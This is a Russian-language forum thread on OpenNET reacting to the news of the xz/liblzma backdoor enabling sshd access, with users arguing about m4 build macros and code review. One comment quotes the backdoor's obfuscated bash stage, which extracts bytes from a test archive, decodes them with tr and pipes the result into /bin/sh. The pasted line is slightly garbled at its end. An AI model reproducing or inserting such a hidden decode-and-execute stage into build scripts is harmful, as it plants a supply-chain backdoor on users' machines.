The OpenNET Project / Index page

[ новости /+++ | форум | теги | ]



Вариант для распечатки  
Пред. тема | След. тема 
Форум Разговоры, обсуждение новостей
Режим отображения отдельной подветви беседы [ Отслеживать ]

Оглавление

В библиотеке xz/liblzma выявлен бэкдор, организующий вход через sshd, opennews (ok), 29-Мрт-24, (0) [смотреть все]

Сообщения [Сортировка по времени | RSS]


136. "В библиотеке xz/liblzma выявлен бэкдор, организующий вход че..."  +5 +/
Сообщение от Анонм (?), 30-Мрт-24, 10:14 
m4-макрос, дата редиза - 1977 год
Конечно использовать инструменты полувековой давно так безопасно!

Которые в последствии порождают (хотя честнее сказать высрыают) баш портянку такого вида


export i="((head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +724)";(xz -dc $srcdir/tests/files/good-large_compressed.lzma|eval $i|tail -c +31265|tr "\5-\51\204-\377\52-\115\132-\203\0-\4\116-\131" "\0-\377")|xz -F raw --lzma1 -dc|/bin/sh-dc|/bin/sh

Да за такой код, без комментариев "чего оно делает", нужно просто закрывать ПР без разговоров.
Хотя я вообще сомневаюсь, что этот кал кто-то читал.

Ответить | Правка | Наверх | Cообщить модератору

231. "В библиотеке xz/liblzma выявлен бэкдор, организующий вход че..."  +/
Сообщение от нах. (?), 30-Мрт-24, 12:50 
> Конечно использовать инструменты полувековой давно так безопасно!

если ты не можешь прочитать простенький код на m4 - каковы твои шансы что-то заметить в кодомусорке для модных систем сборки на десяти нескучных языках?

А если просто не хочешь - то хоть на чем пиши.

Ответить | Правка | Наверх | Cообщить модератору

299. "В библиотеке xz/liblzma выявлен бэкдор, организующий вход че..."  +/
Сообщение от Аноним (292), 30-Мрт-24, 15:55 
>Которые в последствии порождают (хотя честнее сказать высрыают) баш портянку такого вида

Так ты не порождай.

>Да за такой код, без комментариев "чего оно делает", нужно просто закрывать ПР без разговоров.

Ты часом не питонист?

Ответить | Правка | К родителю #136 | Наверх | Cообщить модератору

319. "В библиотеке xz/liblzma выявлен бэкдор, организующий вход че..."  +/
Сообщение от Аноним (319), 30-Мрт-24, 18:49 
И питонист, и сторонник Дяди Боба. А вы можете продолжать знать только JavaScript.
Ответить | Правка | Наверх | Cообщить модератору

Архив | Удалить

Рекомендовать для помещения в FAQ | Индекс форумов | Темы | Пред. тема | След. тема




Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру